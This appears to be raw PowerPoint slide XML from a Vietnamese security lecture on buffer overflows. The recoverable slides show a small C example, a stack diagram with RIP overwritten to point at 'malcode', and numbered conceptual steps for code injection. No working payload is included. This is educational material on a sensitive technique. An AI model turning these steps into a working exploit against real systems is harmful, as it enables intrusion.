                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char *mystr = “AuthMe!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   func(mystr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E5D3C0-3A7D-43BC-BD2E-0353F05FDB44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5201641"/>
            <a:ext cx="14478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777407B1-6E88-4A1D-A40F-9D3161203392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261936" y="5303241"/>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8" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71F1569-58B6-46F8-B250-BD1EE6D95BD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532359" y="5349336"/>
            <a:ext cx="34960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b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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007D1F4C-AA58-4B93-A4D9-0BBF876E47E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985835" y="5349336"/>
            <a:ext cx="34960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b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FA6027-BC6C-4387-AACD-F75DE79F03D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="5639850"/>
            <a:ext cx="701040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7CB5FE4-74CD-4DAD-901E-5C48AE658DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495299" y="4698147"/>
            <a:ext cx="8496300" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dữ liệu tràn ra khỏi bộ đệm có thể </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ghi đè vào các ô nhớ khác</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2674606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01C7-2B6B-4FDD-908B-454FDDAA23C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khai thác lỗ hổng tràn bộ đệm</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00417E3A-C7B2-432A-A8FF-861E75B7048D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1018803"/>
            <a:ext cx="8229600" cy="5458197"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng tràn bộ đệm cho phép kẻ tấn công truy cập (read/write/execute) tùy ý vào vùng nhớ khác</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ơng thức khai thác phổ biến nhất: chèn mã nguồn thực thi (code injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ý t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ởng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FCDD805-9191-41EE-9DC7-23FD87C27856}"/>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6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30B6B87-F81F-4958-AA84-391E093AB198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261936" y="4313670"/>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Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{324B26F7-5E94-4E34-A72F-A376C4F86229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7158166" y="4352562"/>
            <a:ext cx="1757234" cy="5191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bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malcode</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">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A4C02227-44EA-487D-BCE2-49FD38EFAB98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555391" y="4367277"/>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00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="00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E03FAB0-C33E-4103-8C99-A3641C572079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622974" y="4939998"/>
            <a:ext cx="3101425"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 overflow</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:soli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8F6F0626-BC0D-40CD-91A6-D6381D42B203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3561314" y="4367277"/>
            <a:ext cx="1017356"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SFP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>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F34DA746-1467-4348-862F-023B99E15B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664352" y="4358913"/>
            <a:ext cx="833565"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C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RIP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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DE0946A5-EACB-444B-BAFF-4779855EFE1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5571170" y="4367277"/>
            <a:ext cx="1017356"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&amp;arg1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>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BD13DB41-7398-4263-992D-1EE36BC9F91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722333" y="4367277"/>
            <a:ext cx="298090"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t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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2E9EA6C7-671E-453D-B5D4-B6410FF74458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342234" y="4367277"/>
            <a:ext cx="1017356"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text</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="0080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9AE10512-1169-4658-80A9-766A16CBC605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399716" y="3511308"/>
            <a:ext cx="902391"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EIP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDF651A2-214D-4FFF-A8BE-F0A54D7B3FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850912" y="3911418"/>
            <a:ext cx="0" cy="45585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TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F20C0A8-E04A-492B-9910-E257209F1C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707674" y="3496593"/>
            <a:ext cx="902391" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EIP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A667A322-BF0E-4149-B2C3-2D78A8F880BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7158870" y="3896703"/>
            <a:ext cx="0" cy="45585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7" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884B453B-BE5C-4CA9-BD16-479FB58C8EBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399715" y="3352800"/>
            <a:ext cx="902391" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Connector: Curved 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71C7AB2-DA9F-BC10-3371-EFDE9985CC8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="0"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5563272" y="3214512"/>
            <a:ext cx="662265" cy="1626539"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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A416A73-2D60-7BCD-60DB-E23B86361DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767734" y="4775881"/>
            <a:ext cx="3669117" cy="1215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86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0D2A-F525-2597-4542-C2A41FC10CF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code Injection – Cách khai thác</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C2F574-1A1E-558D-0EC5-632AB6A2E964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tìm lỗ hổng an toàn bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ghi mã độc vào một vùng nhớ nào đó</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Phải xác định được địa chỉ vùng nhớ mà mã độc được ghi vào</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ghi đè địa chỉ vùng nhớ chứa mã độc vào RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> Thông thường, từ việc khai thác 1 vị trí lỗi có thể đồng thời ghi mã độc và ghi đè RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hàm có lỗ hổng trả về</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mã độc được thực thi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92EE4D2-08D3-E6E6-60B3-2959AF2E9D48}"/>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818677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F73E-0888-4229-9747-63A7D9D36F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code Injection – Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDEE61B7-1082-406D-BDE3-2B84A94349A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Google Shape;779;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F15855A-F27E-529F-4856-CB7F0D263F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3439750" y="1143000"/>
            <a:ext cx="2926175" cy="4540650"/>
            <a:chOff x="3320800" y="1189300"/>
            <a:chExt cx="2926175" cy="4540650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Google Shape;780;p67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E62BA3E3-79B5-DFE0-D931-DF7939A97382}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3320800" y="1189300"/>
              <a:ext cx="2676600" cy="1169521"/>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gets</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t> bắt đầu ghi từ ô nhớ này và có thể ghi đè tới bất kỳ ô nhớ nào ở trên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r>
                <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>, bao gồm cả RIP!</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Google Shape;781;p67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F6DA35-FA1D-1539-815C-0F9515016A19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4659100" y="2358821"/>
              <a:ext cx="1587875" cy="3371129"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;782;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3832B24-98D1-D468-6867-348D9E3E5A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5032004"/>
